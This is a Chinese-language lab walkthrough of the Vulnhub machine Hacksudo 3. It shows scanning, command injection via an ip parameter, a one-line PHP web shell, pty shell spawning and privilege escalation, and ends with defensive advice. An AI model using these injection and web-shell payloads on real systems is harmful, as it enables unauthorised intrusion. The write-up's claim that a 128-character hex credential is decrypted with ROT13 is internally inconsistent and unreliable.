vulnhub系列7——hacksudo 3
字数 1081 2025-08-11 22:57:21
Hacksudo 3 靶场实战教学文档
1. 靶场概述
Hacksudo 3 是一个来自Vulnhub的渗透测试靶场,主要考察以下技能:
- 信息收集
- Web目录扫描
- 命令注入漏洞利用
- 权限提升技术
- 密码破解技术
2. 环境准备
- 下载靶机:从Vulnhub获取Hacksudo 3镜像
- 网络配置:确保攻击机和靶机在同一网络段(如192.168.56.0/24)
- 攻击机工具准备:
- netdiscover
- nmap
- gobuster/dirbuster
- Burp Suite
- nc/netcat
3. 渗透测试流程
3.1 信息收集阶段
- 网络发现:
netdiscover -r 192.168.56.0/24
- 端口扫描与服务识别:
nmap -sV -Pn -sC 192.168.56.135
3.2 Web应用测试
- 目录扫描:
gobuster dir -u http://192.168.56.135 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x txt,html,php,cgi
- 关键文件发现:
- 发现
generator.php文件存在漏洞 - 参数接收IP地址,可能存在命令注入
3.3 漏洞利用
- 命令注入验证:
http://192.168.56.135/generator.php?ip=127.0.0.1%26%26whoami
- 写入Web Shell:
asd&&echo '<?=system($_GET[1]);?>'>a.php
- 获取交互式Shell:
python3 -c "import pty;pty.spawn('/bin/bash');"
3.4 权限提升
- 查找SUID文件:
find / -perm -u=s -type f 2>/dev/null
- 用户信息收集:
cat /etc/passwd # 发现hacksudo用户
- 密码文件发现:
- 在
/var/www目录下发现包含凭据的文件 - 用户名:hacksudo
- 加密密码:
63c9142792d571d0f7c28eb30626d6f38792a2e7679b76d784231676d62447fb80af8953745f709c6622dda2cb4d754c262d0d31b3030a08f7b524079a6b336b
- 密码解密:
- 使用ROT13(凯撒密码,偏移量13)解密
- 解密后获得hacksudo用户的真实密码
- 获取用户flag:
su hacksudo
cd /home/hacksudo
cat user.txt
- 提权至root:
- 对获取的凭据进行进一步解密
- 成功登录root用户
4. 关键技术点
- 命令注入:
- 通过IP参数注入系统命令
- 使用
&&连接多个命令 - URL编码绕过过滤
- 密码破解:
- 识别加密方式(ROT13)
- 批量解密技术
- 权限提升路径:
- 从Web应用权限到普通用户
- 从普通用户到root权限
5. 防御建议
- 防止命令注入:
- 对用户输入进行严格过滤
- 使用白名单验证IP地址格式
- 避免直接拼接系统命令
- 密码安全:
- 避免使用可逆的简单加密
- 使用强哈希算法(如bcrypt)
- 不要将凭据明文存储在Web目录
- 系统加固:
- 限制SUID文件数量
- 遵循最小权限原则
- 定期审计系统文件权限
6. 总结
Hacksudo 3靶场展示了从Web应用漏洞到系统完全控制的完整渗透路径,重点考察了命令注入和密码破解技术。通过此靶场,可以学习到:
- Web应用安全测试方法
- 系统权限提升技巧
- 密码分析与解密技术
- 渗透测试的完整流程